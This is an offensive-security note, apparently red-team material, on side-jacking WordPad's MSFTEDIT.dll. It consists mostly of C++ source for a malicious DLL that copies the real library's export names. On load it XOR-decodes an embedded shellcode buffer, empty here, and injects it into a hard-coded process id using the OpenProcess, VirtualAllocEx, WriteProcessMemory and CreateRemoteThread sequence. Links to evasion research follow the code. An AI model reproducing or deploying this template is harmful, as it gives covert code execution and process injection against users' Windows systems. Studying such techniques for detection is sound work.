DLL Side-Jacking

MSFTEDIT.dll - Wordpad Sidejacking

// dllmain.cpp : Defines the entry point for the DLL application.
#include <iostream>
#include <string>
#include <Windows.h>

// Exported stub. The name is exported so a host that resolves it from this
// DLL finds it; the function does no work and unconditionally returns false.
extern "C" __declspec(dllexport) bool InitCrashHandler()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

// Exported stub with the same shape as InitCrashHandler: no side effects,
// always returns false.
extern "C" __declspec(dllexport) bool SendReport()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

// Exported stub: no side effects, always returns false.
extern "C" __declspec(dllexport) bool IsReadyToExit()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

// Exported stub: no side effects, always returns false.
extern "C" __declspec(dllexport) bool SetCustomInfo()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

// Exported stub: no side effects, always returns false.
extern "C" __declspec(dllexport) bool AddUserInfoToReport()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}
// Exported stub: no side effects, always returns false.
extern "C" __declspec(dllexport) bool AddFileToReport()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}
// Exported stub: no side effects, always returns false.
extern "C" __declspec(dllexport) bool RemoveFileFromReport()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}
// Exported stub: no side effects, always returns false.
extern "C" __declspec(dllexport) bool GetVersionFromApp()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}
// Exported stub: no side effects, always returns false.
extern "C" __declspec(dllexport) bool GetVersionFromFile()
{
	// Leftover debugging call, disabled.
	//MessageBoxA(NULL, "Uninit", "hi", 0x0000000L);
	return false;
}

*/
//testing creating a new thread from DLL Main
// Worker thread started from DllMain.
// Decodes the embedded byte buffer with a repeated single-byte XOR, then
// injects it into a hard-coded process id using the
// OpenProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread
// sequence. lpParameter is never read. Always returns 1.
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{

	//MessageBoxA(NULL, "hello", "hi", 0x0000000L);
	// Encoded payload. Here it is an empty string literal, so sizeof is 1
	// (just the terminating NUL); the NUL is part of every byte count below.
	unsigned char eShellcode[] =
		"";


/*
char un[32];
DWORD buf = 32;
GetUserNameA(un, &buf);


char hn[32];
DWORD buf2 = 32;
GetComputerNameA(hn, &buf2);
*/
// The disabled block above and the two commented key lines suggest the key
// was at some point derived from the user or computer name; the active key
// is the fixed literal below.
//std::string key = hn;
//std::string key = un;
std::string key = "zyvdx";


// Pass 1: XOR every byte with each key byte in turn. Because XOR is
// associative and commutative, this is the same as XORing every byte once
// with the fold key[0]^key[1]^...^key[n-1]. shellcode[] is kept equal to
// eShellcode[] after every write, so both arrays hold the same data.
// (ii is int while key.length() is size_t: signed/unsigned comparison.)
unsigned char shellcode[sizeof(eShellcode)];
for (int ii = 0; ii < key.length(); ii++) {
	for (int i = 0; i < sizeof eShellcode; i++) {
		shellcode[i] = eShellcode[i] ^ key[ii];
		eShellcode[i] = shellcode[i];
	}
}

// Pass 2: same operation restricted to even indexes (i += 2). Those bytes
// are XORed with the key fold a second time, which cancels pass 1 for them.
// Net effect of both passes: even-indexed bytes equal the original
// eShellcode bytes, odd-indexed bytes are XORed once with the key fold.
for (int ii = 0; ii < key.length(); ii++) {
	for (int i = 0; i < sizeof eShellcode;) {
		shellcode[i] = eShellcode[i] ^ key[ii];
		eShellcode[i] = shellcode[i];
		i = i + 2;
	}
}
//*/
	HANDLE processHandle;
	HANDLE remoteThread;
	PVOID remoteBuffer;

	// Target pid is the literal "6672" parsed with atoi. The returned handle
	// is used without a NULL check; PROCESS_ALL_ACCESS is requested although
	// the comment notes a narrower mask would do.
	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi("6672"))); //can also use PROCESS_VM_WRITE then PROCESS_CREATE_THREAD
	// Remote RWX allocation, cross-process write, then a remote thread whose
	// start address is the freshly written buffer: the textbook remote-thread
	// injection pattern and a standard EDR/ETW detection point. None of the
	// return values are checked.
	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
	remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	// Only the process handle is closed; remoteThread is leaked.
	CloseHandle(processHandle);
	MessageBoxA(NULL, "Preprocess", "hi", 0x0000000L);


	return 1;
}




// DLL entry point. On DLL_PROCESS_ATTACH it shows a message box, starts
// ThreadFunction on a new thread and closes its own copy of the thread
// handle (the thread itself keeps running). hModule and lpReserved are
// unused. Always returns TRUE.
// Note: the DLL_PROCESS_ATTACH block has no `break`, so control falls
// through into the following cases; they only `break`, so this is
// harmless here. Calling MessageBoxA and CreateThread from DllMain runs
// under the loader lock, which Microsoft's DllMain guidance warns against
// (the new thread's DLL_THREAD_ATTACH notification is blocked until this
// DllMain returns).
BOOL __stdcall DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved)
{

	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
		MessageBoxA(NULL, "RunPot", "hi", 0x0000000L);
		HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
		//MessageBoxA(NULL, "RunPot", "hi", 0x0000000L);
		CloseHandle(threadHandle);


	}
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

https://gist.github.com/securitytube/c956348435cc90b8e1f7 https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html https://github.com/fireeye/DueDLLigence https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/ https://www.fireeye.com/blog/threat-research/2020/01/abusing-dll-misconfigurations.html

MSFTEDIT Side Jack With Process Enumeration
